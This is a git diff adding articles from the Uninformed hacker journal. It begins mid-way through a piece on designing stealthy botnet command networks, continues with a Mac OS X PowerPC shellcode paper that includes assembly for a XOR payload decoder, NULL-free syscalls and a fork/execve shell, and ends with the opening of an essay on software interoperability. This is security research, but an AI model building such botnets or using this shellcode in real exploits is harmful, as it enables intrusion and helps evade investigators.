compromised node doesn't endanger the entire + network + - Reliability; to make sure the network is still up and running when most of + its nodes have gone + - Stealthiness on the infected host as well as on the network + +At this point one should distinguish between unlinked and +linked, or passive, botnets. Unlinked means each node is on +its own. The nodes poll some central resource for information. +Information can include commands to download software updates, to +execute a program at a certain time, or the order a DDoS on a given +target machine. A linked botnet means the nodes don't do anything by +themselves but wait for command packets instead. Both approaches +have advantages and disadvantages. While a linked botnet can react +faster and may be more stealthy considering the fact that it doesn't +build up periodic network connections to look out for commands, it +also won't work for infected nodes sitting behind firewalls. Those +nodes may be able to reach a website to look for commands, which +means an unlinked approach would work for them, but command packets +like in the linked approach won't reach them, as the firewall will +filter those out. Also, consider the case of trying to build up a +botnet with the next Windows worm. Infected Windows machines are +generally home users with dynamic IP addresses. End-user machines +change IPs regularly or are turned off because the owner is at work +or on a hunting weekend. Good luck trying to keep an up-to-date list +of infected IPs. So basically, depending on the purpose of the +botnet, one needs to decide which approach to use. A combination of +both might be best. The nodes could, for example, poll a resource of +information once a day, where commands that don't require immediate +attention are waiting for them. On the other hand if there's +something urgent, sending command packets to certain nodes could +still be an option. Imagine a sort of unlinked botnet. No node knows +about another node and nor does it ever contact one of its brothers, +which perfectly achieves our goal of containment. These nodes +periodically contact what the author has labeled a resource +of information to retrieve their latest orders. What could such a +resource look like? + +The following attributes are desirable: + + - It shouldn't be a single point for failure, like a single host that makes + the whole system break down once it's removed. + - It should be highly anonymous, meaning connecting there shouldn't be + suspicious activity. To the contrary, the more people requesting information + from it the better. This way the nodes' connections would vanish in the + masses. + - The system shouldn't be owned by the botnet master. Anonymity is one of the + botnet's primary goals after all. + - It should be easy to post messages there, so that commands to the botnet can + be sent easily. + +There are several options to achieve these goals. It could be: + + - Usenet: Messages posted to a large newsgroup which contain + steganographically hidden commands that are cryptographically signed + achieves all of the above mentioned goals. + - P2P networks: The nodes link to a server once in a while and, like hundreds + of thousands of other people, search for a certain term (``xxx''), and find + command files. File size could be an indicator for the nodes that a certain + file may be a command file. + - The Web itself: This one would potentially be slow, but of course it's also + possible to setup a website that includes commands, and register that site + with a search engine. To find said site, the zombies would connect to the + search engine and submit a keyword. A special title of the website would + make it possible to identify the right page between thousands of other hits + on the keyword, without visiting each of them. + + + +Using those methods, it would be possible to administer even large +botnets without even having to know the IP adresses of the nodes. +The ``distance'' between botnet owner and botnet drone would be as +large as possible since there would be no direct connection between +the two. These approaches also face several problems, though: + + +How would the botnet master determine the number of infected hosts +that are up and running? Only in the case of the website would +estimation of the number of nodes be possible by inspecting the +access logs, even logging were to be enabled. In the case of the +Usenet approach a command of ``DDoS Ebay/Yahoo/Amazon/CNN'' might +just reach the last 5 remaining hosts, and the attacker would only +be left with the knowledge that it somehow didn't work. The problem +is, however, that the attacker would not know the number of zombies +that would actually take part in the attack. The same problem occurs +with the type and location of the infected hosts. Some might be high +profile, such as those connecting from big corporations, game +developers, or financial institutions. The attacker might be +interested in abusing those for something other than Spam and DDoS, +if he knew about them in particular. If the attacker wants to bounce +his connections over 5 of his compromised nodes to make sure he +can't be traced, then it is required that he be able to communicate +with 5 nodes only and that he must know address information about +the nodes. If the attacker doesn't have a clue which IP addresses +his nodes have, how can he tell 5 of them where to connect to? +Besides the obvious problem of timing, of course. If the nodes poll +for a new command file once every 24 hours, he'd have to wait 24 +hours in the worst case until the last node finds out it's supposed +to bind a port and forward the connection to somewhere else. + + +4.1) The Linked Network + +Though I called this approach a passive network, as the nodes idle +and wait for commands to come to them, this type of botnet is in +fact quite active. The mechanisms described now will not (easily) +work when most of the nodes are on dynamic IP addresses. It is thus +more interesting for nodes installed after exploiting some kind of +server software. Of course, while not solving the uptime problem, a +rogue dyndns account can always give a dynamic IP a static hostname. + + + +This kind of network focuses on all of its nodes forming some kind +of self-organizing peer to peer network. A node that infects some +other host can send over the botnet program and make the new host +link to itself, thus becoming that node's parent. This technique can +make the infected hosts form a sort of tree structure over time, as +each newly infected host tries to link to the infecting host. +Updates, information, and commands can be transmitted using this +worm network to reach each node, no matter which node it was sent +from, as each node informs both child nodes as well as its parent +nodes. In its early (or final) stages, a network of this type might +look like this piece of ascii art: + + Level + 0 N + / \ + 1 N N + / \ / + 2 N N N + +To make sure a 'successful' node that infects lots of hosts doesn't +become the parent of all of those hosts, nodes must refuse link +requests from child nodes after a certain number have been linked +(say 5). The parent can instead in form the would-be child to link +to one of its already established children instead. By keeping track +of the number of nodes linked to each location in the tree, a parent +can even try to keep the tree thats hierarchically below it well +balanced. This way a certain node would know about its parent and up +to 5 children, thus keeping the number of other hosts that someone +who compromises a node rather low, while still making sure to have a +network that's as effective as possible. Depending on the number of +nodes in the entire network, the amount of children that may link to +a parent node could be easily changed to make the network scale +better. As each node may be some final link as well as a parent +node, every host runs the same program. There's no need for special +'client' and 'server' nodes. + + +Whats the problem with a tree structure? Well, what if a parent +fails? Say a node has 3 children, each having 2 children of its own. +Now this node fails because the owner decides to reinstall the host. +Are we left with 3 networks that can't communicate with each other +any more? Not necessarily. While possibly giving a forensics expert +information on additional hosts, to increase reliability each node +has to know about at least one more upstream node that it can try to +link to if its parent is gone. An ideal candidate could be the +parent's parent. In order to make sure that all nodes are still +linked to the network, a periodic (once a day) sort of ``ping'' +through the entire network has to happen in any case. By giving a +child node the IP of its ``grandparent'', the direct parent of the +child node always knows that the fail-over node, the one its kids +will try to link to if it should fail, is still up and running. + + +Though this may help to address the issue of parent death, another +issue remains. If the topmost node fails, there are no more +upstream nodes that the children could link to. Thats why in this +case the children should have the ip of one(!) of its siblings as +the fail-over address so that they can make this one the new top +node in the case of a fail-over condition. Making use of the +node-based ping, each node also knows how many of its children are +still up and running. By including this number into the ping sent to +the parent, the topmost node could always tell the number of linked +hosts. In order to not have to rely on connecting to the topmost +node to collect this type of information, a simple command can be +implemented to make the topmost node report this info to any node on +the network that asks for it. Using a public key stored into all the +nodes, it's even possible to encrypt every piece of information +thats destined for the botnet owner, making sure that no one besides +the owner can decrypt the data. Although this type of botnet may +give a forensics expert or someone with a sniffer information on +other nodes that are part of the network, it also offers fast +response times and more flexibility in the (ab)use of the network +compared to the previous approach with the unlinked nodes. It's a +sort of trade off between the biggest possible level of anonymity on +one hand, and flexibility on the other. It is a huge step up +compared to all of the zombies sitting on IRC servers right now, +where a single channel contains the zombies of the entire botnet. By +employing cryptography to store the IPs of the child and parent +nodes, and keeping those IPs only in RAM mitigates the problem +further. + + +Once a drone network of this type has been established with several +hundreds of hosts, there are lots of possibilities of putting it to +use. To conceal the originating IP address of a connection, hopping +over several nodes of the drone network to a target host can be +easily accomplished. A command packet tells one node to bind a port. +Once it receives a connection on it, it is told to command a second +node to do the same, and from then on node 1 forwards all the +traffic to node 2. Node 2 does the same, and forwards to node 3, +then 4, maybe 5, until finally the last node connects to the +intended destination IP. By encrypting the entire connection from +the original source IP address up to the last node, a possible +investigator sniffing node 2 will not see the commands (and thus the +IP addresses) which tell node 3 to connect to node 4, node 4 to node +5, and of course especially not the destination host's address. An +idle timeout makes sure that connections don't stay up forever. + + +As manually updating several hundreds or thousands of hosts is +tedious work, an easy updating system should be coded into the +nodes. There are basically two possible ways to realize that. A +command, distributed from node to node all over the network, could +make each node replace itself with a newer version which it may +download from a certain HTTP address. The other way is by updating +the server software on one node, which in turn distributes this +update to all the nodes it's linked to (children and +parent), which do just the same. Cryptographic signatures are a must +of course to make sure someone doesn't replace all of the precious +nodes with SETI@home. Vlad902 suggested a simple and effective way +to do that. Each node gets an MD5 hash hardcoded into it. Whenever +someone offers a software update, it will download the first X bytes +and see wether they hash to the hardcoded value. If they do, the +update will be installed. Of course, a forensics expert may extract +the hash out of an identified node. However, due to the nature of +cryptographic hashes, he won't be able to tell which byte sequence +generates that hash. This will prevent the forensics export from +creating a malicious update to take down the network. As the value +used to generate the hash has to be considered compromised after an +update, each update has to supply a new hash value to look out for. + + +Further security mechanisms could include making the network +completely memory resident, and parents keeping track of kids, and +reinfecting those if necessary. What never hit the hard-disk can +obviously not be found by forensics. Also, commands should be +time-stamped to make sure a certain command will only work once, and +replay attacks (sending a sniffed command packet to trigger a +response from a node) will fail. Using public key cryptography to +sign and encrypt data and communication is always a nice idea too, +but it also has 2 disadvantages: + + - It usually produces quite a big overhead to incorporate into the code. + - Holding the one and only private key matching to a public key thats been + found on hundreds of hacked hosts is quite incriminating evidence. + +An additional feature could be the incorporation of global unique +identifiers into the network, providing each node with a unique ID +that's set upon installation on each new victim. While the network +master would have to keep track of host addresses and unique IDs, he +could use this feature to his advantage. Imagine a sort of +traceroute within the node network. The master wants to know where a +certain host is linked to. Every node knows the IDs of all of the +child nodes linked hierarchically below it. So he asks the topmost +node to find out the path to the node he's interested in. The +topmost node realizes it's linked somewhere under child 2, and in +turn asks child 2. This node knows it's linked somewhere below child +4, and so on and so on. In the end, the master gets his information, +a couple of IDs, while no node thats not directly linked to another +gets to know the IPs of further hosts that are linked to the +network. + + +Since a portscan shouldn't reveal a compromised host, a raw socket +must be used to sniff command packets off the wire. Also, command +packets should be structured as unsuspicious as possible, to make it +look like the host just got hit by yet another packet of ``internet +background noise''. DNS replies or certain values in TCP SYN packets +could do the trick. + + +4.2) The Hybrid + +There is a way to combine both the anonymity of an unlinked network +with the quick response time of the linked approach. This can be +done by employing a technique first envisioned in the description of +a so-called ``Warhol Worm''. While no node knows anything about +other nodes, the network master keeps track of the IPs of infected +hosts. To distribute a command to a couple or maybe all of the +nodes, he first of all prepares an encrypted file containing the IPs +of all active nodes, and combines that with the command to execute. +He then sends this commandfile to the first node on the list. This +node executes the command, takes itself from the list, and goes top +to bottom through the list, until it finds another active node, +which it transmits the command file to. This way each node will only +get to know about other nodes when receiving commandfiles, which are +subsequently erased after the file has been successfully transmitted +to another node. By calling certain nodes by their unique IDs, it's +even possible to make certain nodes take different actions than all +the others. By preparing different files and sending them to +different nodes at start already, quite a fast distribution time can +be achieved. Of course, should someone accomplish to not only sniff +the commandfile, but also decrypt it, he has an entire list of +infected hosts. Someone sniffing a node will still also see an +incoming connection from somewhere, and an outgoing connection to +somewhere else, and thus get to know about 2 more nodes. Thats just +the same as depicted in the passive approach. Whats different is +that a binary analysis of a node will not divulge information on +another host of the network. As sniffing is probably more of a +threat than binary analysis though, and considering a linked network +offers way more flexibility, the Hybrid is most likely an inferior +approach. + + +5) Conclusion + +When it comes to botnets, the malcode development is still in it's +infancy, and while today's networks are very basic and easily +detected, the reader should by now have realized that there are far +better and stealthier ways to link compromised hosts into a network. +And who knows, maybe one or more advanced networks are already in +use nowadays, and even though some of their nodes have been spotted +and removed already, the network itself has just not been identified +as being one yet. + + +Bibliography + +The Honeypot Project. Know Your Enemy: Tracking Botnets. +http://www.honeynet.org/papers/bots/ + +Weaver, Nicholas C. Warhol Worms: The Potential for Very +Fast Internet Plagues. +http://www.cs.berkeley.edu/ nweaver/warhol.html + +Paxson, Vern, Stuart Staniford Nicholas Weaver. How to +0wn the Internet in Your Spare Time. +http://www.icir.org/vern/papers/cdc-usenix-sec02/ + +Zalewski, Michael. Writing Internet Worms for Fun and +Profit. +http://www.securitymap.net/sdm/docs/virus/worm.txt diff --git a/uninformed/1.6.txt b/uninformed/1.6.txt new file mode 100644 index 0000000..714e29c --- /dev/null +++ b/uninformed/1.6.txt @@ -0,0 +1,510 @@ + +Mac OS X PPC Shellcode Tricks +H D Moore +hdm[at]metasploit.com +Last modified: 05/09/2005 + +0) Foreword + +Abstract: + +Developing shellcode for Mac OS X is not particularly difficult, but there are +a number of tips and techniques that can make the process easier and more eff +ective. The independent data and instruction caches of the PowerPC processor +can cause a variety of problems with exploit and shellcode development. The +common practice of patching opcodes at run-time is much more involved when the +instruction cache is in incoherent mode. NULL-free shellcode can be improved by +taking advantage of index registers and the reserved bits found in many +opcodes, saving space otherwise taken by standard NULL evasion techniques. The +Mac OS X operating system introduces a few challenges to unsuspecting +developers; system calls change their return address based on whether they +succeed and oddities in the Darwin kernel can prevent standard execve() +shellcode from working properly with a threaded process. The virtual memory +layout on Mac OS X can be abused to overcome instruction cache obstacles and +develop even smaller shellcode. + +Thanks: + +The author would like to thank B-r00t, Dino Dai Zovi, LSD, Palante, Optyx, and +the entire Uninformed Journal staff. + +1) Introduction + +With the introduction of Mac OS X, Apple has been viewed with mixed feelings by +the security community. On one hand, the BSD core offers the familiar Unix +security model that security veterans already understand. On the other, the +amount of proprietary extensions, network-enabled software, and growing mass of +advisories is giving some a cause for concern. Exploiting buffer overflows, +format strings, and other memory-corruption vulnerabilities on Mac OS X is a +bit different from what most exploit developers are familiar with. The +incoherent instruction cache, combined with the RISC fixed-length instruction +set, raises the bar for exploit and payload developers. + +On September 12th of 2003, B-r00t published a paper titled "Smashing the Mac +for Fun and Profit". B-root's paper covered the basics of Mac OS X shellcode +development and built on the PowerPC work by LSD, Palante, and Ghandi. This +paper is an attempt to extend, rather than replace, the material already +available on writing shellcode for the Mac OS X operating system. The first +section covers the fundamentals of the PowerPC architecture and what you need +to know to start writing shellcode. The second section focuses on avoiding NULL +bytes and other characters through careful use of the PowerPC instruction set. +The third section investigates some of the unique behavior of the Mac OS X +platform and introduces some useful techniques. + +2) PowerPC Basics + +The PowerPC (PPC) architecture uses a reduced instruction set consisting of +32-bit fixed-width opcodes. Each opcode is exactly four bytes long and can only +be executed by the processor if the opcode is word-aligned in memory. + + +2.1) Registers + +PowerPC processors have thirty-two 32-bit general-purpose registers (r0-r31) +PowerPC 64-bit processors have 64-bit general-purpose registers, but still use +32-bit opcodes, thirty-two 64-bit floating-point registers (f0-f31), a link +register (lr), a count register (ctr), and a handful of other registers for +tracking things like branch conditions, integer overflows, and various machine +state flags. Some PowerPC processors also contain a vector-processing unit +(AltiVec, etc), which can add another thirty-two 128-bit registers to the set. + + +On the Darwin/Mac OS X platform, r0 is used to store the system call number, r1 +is used as a stack pointer, and r3 to r7 are used to pass arguments to a system +call. General-purpose registers between r3 and r12 are considered volatile and +should be preserved before the execution of any system call or library +function. + +;; +;; Demonstrate execution of the reboot system call +;; +main: + li r0, 55 ; #define SYS_reboot 55 + sc + +2.2) Branches + +Unlike the IA32 platform, PowerPC does not have a call or jmp instruction. +Execution flow is controlled by one of the many branch instructions. A branch +can redirect execution to a relative address, absolute address, or the value +stored in either the link or count registers. Conditional branches are +performed based on one of four bit fields in the condition register. The count +register can also be used as a condition for branching and some instructions +will automatically decrement the count register. A branch instruction can +automatically set the link register to be the address following the branch, +which is a very simple way to get the absolute address of any relative location +in memory. + +;; +;; Demonstrate GetPC() through a branch and link instruction +;; +main: + + xor. r5, r5, r5 ; xor r5 with r5, storing the value in r5 + ; the condition register is updated by the . modifier +ppcGetPC: + bnel ppcGetPC ; branch if condition is not-equal, which will be false + ; the address of ppcGetPC+4 is now in the link register + + mflr r5 ; move the link register to r5, which points back here + + +2.3) Memory + +Memory access on PowerPC is performed through the load and store instructions. +Immediate values can be loaded to a register or stored to a location in memory, +but the immediate value is limited to 16 bits. When using a load instruction on +a non-immediate value, a base register is used, followed by an offset from that +register to the desired location. Store instructions work in a similar fashion; +the value to be stored is placed into a register, and the store instruction +then writes that value to the destination register plus an offset value. +Multi-word memory instructions exist, but are considered bad practice to use, +since they may not be supported in future PowerPC processors. + +Since each PowerPC instruction is 32 bits wide, it is not possible to load a +32-bit address into a register with a single instruction. The standard method +of loading a full 32-bit value requires a load-immediate-shift (lis) followed +by an or-immediate (ori). The first instruction loads the high 16 bits, while +the second loads the lower 16 bits Some people prefer to use +add-immediate-shift against the r0 general purpose register. The r0 register +has a special property in that anytime it is used for addition or substraction, +it is treated as a zero, regardless of the current value 64-bit PowerPC +processors require five separate instructions to load a 32-bit immediate value +into a general-purpose register. This 16-bit limitation also applies to +relative branches and every other instruction that uses an immediate value. + +;; +;; Load a 32-bit immediate value and store it to the stack +;; +main: + + lis r5, 0x1122 ; load the high bits of the value + ; r5 contains 0x11220000 + + ori r5, r5, 0x3344 ; load the low bits of the value + ; r5 now contains 0x11223344 + + stw r5, 20(r1) ; store this value to SP+20 + lwz r3, 20(r1) ; load this value back to r3 + + +2.4) L1 Cache + +The PowerPC processor uses one or more on-chip memory caches to accelerate +access to frequently referenced data and instructions. This cache memory is +separated into a distinct data and instruction cache. Although the data cache +operates in coherent mode on Mac OS X, shellcode developers need to be aware of +how the data cache and the instruction cache interoperate when executing +self-modifying code. + +As a superscalar architecture, the PowerPC processor contains multiple +execution units, each of which has a pipeline. The pipeline can be described as +a conveyor belt in a factory; as an instruction moves down the belt, specific +steps are performed. To increase the efficiency of the pipeline, multiple +instructions can put on the belt at the same time, one behind another. The +processor will attempt to predict which direction a branch instruction will +take and then feed the pipeline with instructions from the predicted path. If +the prediction was wrong, the contents of the pipeline are trashed and correct +instructions are loaded into the pipeline instead. + +This pipelined execution means that more than one instruction can be processed +at the same time in each execution unit. If one instruction requires the output +of another, a gap can occur in the pipeline while these dependencies are +satisfied. In the case of store instruction, the contents of the data cache +will be updated before the results are flushed back to main memory. If a load +instruction is executed directly after the store, it will obtain the +newly-updated value. This occurs because the load instruction will read the +value from the data cache, where it has already been updated. + +The instruction cache is a different beast altogether. On the PowerPC platform, +the instruction cache is incoherent. If an executable region of memory is +modified and that region is already loaded into the instruction cache, the +modifed instructions will not be executed unless the cache is specifically +flushed. The instruction cache is filled from main memory, not the data cache. +If you attempt to modify executable code through a store instruction, flush the +cache, and then attempt to execute that code, there is still a chance that the +original, unmodified code will be executed instead. This can occur because the +data cache was not flushed back to main memory before the instruction cache was +filled. + +The solution is a bit tricky, you must use the "dcbf" instruction to invalidate +each block of memory from the data cache, wait for the invalidation to complete +with the "sync" instruction, and then flush the instruction cache for that +block with "icbi". Finally, the "isync" instruction needs to be executed before +the modified code is actually used. Placing these instructions in any other +order may result in stale data being left in the instruction cache. Due to +these restrictions, self-modifying shellcode on the PowerPC platform is rare +and often unreliable. + +The example below is a working PowerPC shellcode decoder included with the +Metasploit Framework (OSXPPCLongXOR). + +;; +;; Demonstrate a cache-safe payload decoder +;; Based on Dino Dai Zovi's PPC decoder (20030821) +;; +main: + xor. r5, r5, r5 ; Ensure that the cr0 flag is always 'equal' + bnel main ; Branch if cr0 is not-equal and link to LMain + mflr r31 ; Move the address of LMain into r31 + addi r31, r31, 68+1974 ; 68 = distance from branch -> payload + ; 1974 is null eliding constant + subi r5, r5, 1974 ; We need this for the dcbf and icbi + lis r6, 0x9999 ; XOR key = hi16(0x99999999) + ori r6, r6, 0x9999 ; XOR key = lo16(0x99999999) + addi r4, r5, 1974 + 4 ; Move the number of words to code into r4 + mtctr r4 ; Set the count register to the word count + +xorlp: + lwz r4, -1974(r31) ; Load the encoded word into memory + xor r4, r4, r6 ; XOR this word against our key in r6 + stw r4, -1974(r31) ; Store the modified work back to memory + dcbf r5, r31 ; Flush the modified word to main memory + .long 0x7cff04ac ; Wait for the data block flush (sync) + icbi r5, r31 ; Invalidate prefetched block from i-cache + + subi r30, r5, -1978 ; Move to next word without using a NULL + add. r31, r31, r30 + + bdnz- xorlp ; Branch if --count == 0 + .long 0x4cff012c ; Wait for i-cache to synchronize (isync) + + ; Insert XORed payload here + .long (0x7fe00008 ^ 0x99999999) + +3) Avoiding NULLs + +One of the most common problems encountered with shellcode development in +general and RISC processors in particular is avoiding NULL bytes in the +assembled code. On the IA32 platform, NULL bytes are fairly easy to dodge, +mostly due to the variable-length instruction set and multiple opcodes +available for a given task. Fixed-width opcode architectures, like PowerPC, +have fixed field sizes and often pad those fields with all zero bits. +Instructions that have a set of undefined bits often set these bits to zero as +well. The result is that many of the available opcodes are impossible to use +with NULL-free shellcode without modification. + +On many platforms, self-modifying code can be used to work around NULL byte +restrictions. This technique is not useful for single-instruction patching on +PowerPC, since the instruction pre-fetch and instruction cache can result in +the non-modified instruction being executed instead. + + +3.1) Undefined Bits + +To write interesting shellcode for Mac OS X, you need to use system calls. One +of the first problems encountered with the PowerPC platform is that the system +call instruction assembles to 0x44000002, which contains two NULL bytes. If we +take a look at the IBM PowerPC reference for the 'sc' instruction, we see that +the bit layout is as follows: + +010001 00000 00000 0000 0000000 000 1 0 +------ ----- ----- ---- ------- --- - - + A B C D E F G H + +These 32 bits are broken down into eight specific fields. The first field (A), +which is 5 bits wide, must be set to the value 17. The bits that make up B, C, +and D are all marked as undefined. Field E is must either be set to 1 or 0. +Fields F and H are undefined, and G must always be set to 1. We can modify the +undefined bits to anything we like, in order to make the corresponding byte +values NULL-free. The first step is to reorder these bits along byte boundaries +and mark what we are able to change. + +? = undefined +# = zero or one +[010001??] [????????] [????0000] [00#???1?] + +The first byte of this instruction can be either 68, 69, 70, or 71 (DEFG). The +second byte can be any character at all. The third byte can either be 0, 16, +32, 48, 64, 80, 96, 112, 128, 144, 160, 176, 192, 208, 224, or 240 (which +contains '0', 'P', and 'p', among others). The fourth value can be any of the +following values: 2, 3, 6, 7, 10, 11, 14, 15, 18, 19, 22, 23, 26, 27, 30, 31, +34, 35, 38, 39, 42, 43, 46, 47, 50, 51, 54, 55, 58, 59, 62, 63. As you can see, +it is possible to create thousands of different opcodes that are all treated by +the processor as a system call. The same technique can be applied to almost any +other instruction that has undefined bits. Although the current line of PowerPC +chips used with Mac OS X seem to ignore the undefined bits, future processors +may actually use these bits. It is entirely possible that undefined bit abuse +can prevent your code from working on newer processors + +;; +;; Patching the undefined bits in the 'sc' opcode +;; +main: + li r0, 1 ; sys_exit + li r3, 0 ; exit status + .long 0x45585037 ; sc patched as "EXP7" + + +3.2) Index Registers + +On the PowerPC platform, immediate values are encoded using all 16 bits. If the +assembled value of your immediate contains a NULL, you will need to find another +way to load it into the target register. The most common technique is to first +load a NULL-free value into a register, then substract that value minus the +difference to your immediate. + +;; +;; Demonstrate index register usage +;; +main: + li r7, 1999 ; place a NULL-free value into the index + subi r5, r7, 1999-1 ; substract our value minus the target + ; the r5 register is now set to 1 + +If you have a rough idea of the immediate values you will need in your +shellcode, you can take this a step further. Set your initial index register to +a value, that when decremented by the immediate value, actually results in a +character of your choice. If you have two distant ranges (1-10 and 50-60), then +consider using two index registers. The example below demonstrates an index +register that works for the system call number as well as the arguments, +leaving the assembled bytes NULL-free. As you can see, besides the four bytes +required to set the index register, this method does not significantly increase +the size of the code. + +;; +;; Create a TCP socket without NULL bytes +;; +main: + li r7, 0x3330 ; 0x38e03330 = NULL-free index value + subi r0, r7, 0x3330-97 ; 0x3807cd31 = system call for sys_socket + subi r3, r7, 0x3330-2 ; 0x3867ccd2 = socket domain + subi r4, r7, 0x3330-1 ; 0x3887ccd1 = socket type + subi r5, r7, 0x3330-6 ; 0x38a7ccd6 = socket protocol + .long 0x45585037 ; patched 'sc' instruction + + +3.3) Branching + +Branching to a forward address without using NULL bytes can be tricky on +PowerPC systems. If you try branching forward, but less than 256 bytes, your +opcode will contain a NULL. If you obtain your current address and want to +branch to an offset from it, you will need to place the target address into the +count register (ctr) or the link register (lr). If you decide to use the link +register, you will notice that every valid form of "blr" has a NULL byte. You +can avoid the NULL byte by setting the branch hint bits (19-20) to "11" +(unpredictable branch, do not optimize). The resulting opcode becomes +0x4e804820 instead of 0x4e800020 for the standard "blr" instruction. + +The branch prediction bit (bit 10) can also come in handy, it is useful if you +need to change the second byte of the branch instruction to a different +character. The prediction bit tells the processor how likely it is that the +instruction will result in a branch. To specify the branch prediction bit in +the assembly source, just place '-' or '+' after the branch instruction. + + +4) Mac OS X Tricks + +This section describes a handful of tips and tricks for writing shellcode on +the Mac OS X platform. + + +4.1) Diagnostic Tools + +Mac OS X includes a solid collection of development and diagnostic tools, many +of which are invaluable for shellcode and exploit development. The list below +describes some of the most commonly used tools and how they relate to shellcode +development. + + Xcode: This package includes 'gdb', 'gcc', and 'as'. Sadly, objdump is not + included and most disassembly needs to be done with 'gdb' or 'otool'. + ktrace: The ktrace and kdump tools are equivalent to strace on Linux and truss + on Solaris. There is no better tool for quickly diagnosing shellcode + bugs. + vmmap: If you were looking for the equivalent of /proc/pid/maps, you found it. + Use vmmap to figure out where the heap, library, and stacks are mapped. + crashreporterd: This daemon runs by default and creates very nice crash dumps + when a system service dies. Invaluable for finding 0-day in Mac OS X + services. The crashdump logs can be found in /Library/Logs/CrashReporter. + heap: Quickly list all heaps in a process. This can be handy when the + instruction cache prevents a direct return and you need to find an + alternate shellcode location. + otool: List all libraries linked to a given binary, disassemble mach-o + binaries, and display the contents of any section of an executable or + library. This is the equivalent of 'ldd' and 'objdump' rolled into a + single utility + + +4.2) System Call Failure + +An interesting feature of Mac OS X is that a successful system call will return +to the address 4 bytes after the end of 'sc' instruction and a failed system +call will return directly after the 'sc' instruction. This allows you to +execute a specific instruction only when the system call fails. The most common +application of this feature is to branch to an error handler, although it can +also be used to set a flag or a return value. When writing shellcode, this +feature is usually more annoying than anything else, since it boosts the size +of your code by four bytes per system call. In some cases though, this feature +can be used to shave an instruction or two off the final payload. + + +4.3) Threads and Execve + +Mac OS X has an undocumented behavior concerning the execve() system call +inside a threaded process. If a process tries to call execve() and has more +than one active thread, the kernel returns the error EOPNOTSUPP. After a closer +look at kernexec.c in the Darwin XNU source code, it becomes apparent that for +shellcode to function properly inside a threaded process, it will need to call +either fork() or vfork() before calling execve(). + +;; +;; Fork and execute a command shell +;; +main: +_fork: + li r0, 2 + sc + b _exitproc + +_execsh: ; based on ghandi's execve + xor. r5, r5, r5 + bnel _execsh + mflr r3 + addi r3, r3, 32 ; 32 + stw r3, -8(r1) ; argv[0] = path + stw r5, -4(r1) ; argv[1] = NULL + subi r4, r1, 8 ; r4 = {path, 0} + li r0, 59 + sc ; execve(path, argv, NULL) + b _exitproc + +_path: + .ascii "/bin/csh" ; csh handles seteuid() for us + .long 0 + +_exitproc: + li r0, 1 + li r3, 0 + sc + +4.4) Shared Libraries + +The Mac OS X user community tends to have one thing in common -- they keep +their systems up to date. The Apple Software Update service, once enabled, is +very insistent about installing new software releases as they become available. +The result is that nearly every single Mac OS X system has the exact same +binaries. System libraries are often loaded at the exact same virtual address +across all applications. In this sense, Mac OS X is starting to resemble the +Windows platform. + +If all processes on all Mac OS X system have the same virtual addresses for the +same libraries, Windows-style shellcode starts to become possible. Assuming you +can find the right argument-setting code in a shared library, return-to-library +payloads also become much more feasible. These libraries can be used as return +addresses, similar to how Windows exploits often return back to a loaded DLL. +Some useful addresses are listed below: + + + 0x90000000: The base address of the system library (libSystem.B.dylib), most + of the function locations are static across all versions of OS X. + 0xffff8000: The base address of the "common" page. A number of useful + functions and instructions can be found here. These functions + include memcpy, sysdcacheflush, sysicacheinvalidate, and bcopy. + + +The following NULL-free example uses the sysicacheinvalidate function to flush +1040 bytes from the instruction cache, starting at the address of the payload: + +;; +;; Flush the instruction cache in 32 bytes +;; +main: +_main: + xor. r5, r5, r5 + bnel main + mflr r3 + +;; flush 1040 bytes starting after the branch + li r4, 1024+16 + +;; 0xffff8520 is __sys_icache_invalidate() + addis r8, r5, hi16(0xffff8520) + ori r8, r8, lo16(0xffff8520) + mtctr r8 + bctrl + + +5) Conclusion + +In the first section, we covered the fundamentals of the PowerPC platform and +described the syscall calling convention used on the Darwin/Mac OS X platform. +The second section introduced a few techniques for removing NULL bytes from +some common instructions. In the third section, we presented some of the tools +and techniques that can be useful for shellcode development. + + +Bibliography + +B-r00t PowerPC / OSX (Darwin) Shellcode Assembly. +http://packetstormsecurity.org/shellcode/PPC_OSX_Shellcode_Assembly.pdf + + +Bunda, Potter, Shadowen Powerpc Microprocessor Developer\'s Guide. +http://www.amazon.com/exec/obidos/tg/detail/-/0672305437/ + +Steve Heath Newnes Power PC Programming Pocket Book. +http://www.amazon.com/exec/obidos/tg/detail/-/0750621117/ + + +IBM PowerPC Assembler Language Reference. +http://publib16.boulder.ibm.com/pseries/en_US/aixassem/alangref/mastertoc.htm diff --git a/uninformed/1.7.txt b/uninformed/1.7.txt new file mode 100644 index 0000000..f087851 --- /dev/null +++ b/uninformed/1.7.txt @@ -0,0 +1,567 @@ +What Were They Thinking? +Annoyances Caused by Unsafe Assumptions +skape +mmiller@hick.org +Last modified: 04/04/2005 + + +1) Introduction + +There is perhaps no issue more dear to a developer's heart than the +issue of interoperability with third-party applications. In some +cases, software that is being written by one developer has to be +altered in order to make it function properly when used in +conjunction with another application that is created by a +third-party. For the sake of illustration, the lone developer will +henceforth be referred to as the protagonist given his or her +valiant efforts in their quest to obtain that which is almost always +unattainable: interoperability. The third-parties, on the other +hand, will be referred to as the antagonists due to their wretched +attempts to prevent the protagonist from obtaining his or her goal +of a utopian software environment. Now, granted, that's not to say +that the protagonist can't also become the antagonist by continuing +the ugly cycle of exposing compatibility issues to other would-be +protagonists, but for the sake of discussion such a point is not +relevant. + +What is relevant, however, are the ways in which an antagonistic +developer can write software that will force other developers to +work around issues exposed by the software that the antagonist has +written. There are far too many specific issues to list, but the +majority of these issues can be generalized into one category that +will serve as the focus for this document. To put it simply, many +developers make assumptions about the state of the machine that +their software will be executing on. For instance, some software +will assume that they are the only piece of software performing a +given task on a machine. In the event that another piece of software +attempts to perform a similar task, such as may occur when two +applications need to extend APIs by hooking them, the results may be +unpredictable. Perhaps a more concrete example of where assumptions +can lead to problems can be seen when developers assume that the +behavior of undocumented or unexposed APIs will not change. + +Before putting all of the blame on the antagonists, however, it is +important to understand that it is, in most cases, necessary to make +assumptions about the way in which undocumented code performs, such +as when dealing with low-level software. This is especially true +when dealing with closed-source APIs, such as those provided by +Microsoft. To that point, Microsoft has made an effort to document +the ways in which every exposed API routine can perform, thereby +reducing the number of compatibility issues that a developer might +experience if they were to assume that a given routine would always +perform in the same manner. Furthermore, Microsoft is renowned for +attempting to always provide backwards compatibility. If a +Microsoft application performs one way in a given release, chances +are that it will continue to perform in the same fashion in +subsequent releases. Third-party vendors, on the other hand, tend to +have a more egocentric view of the way in which their software +should work. This leads most vendors to dodge responsibility by +pointing the blame at the application that is attempting to 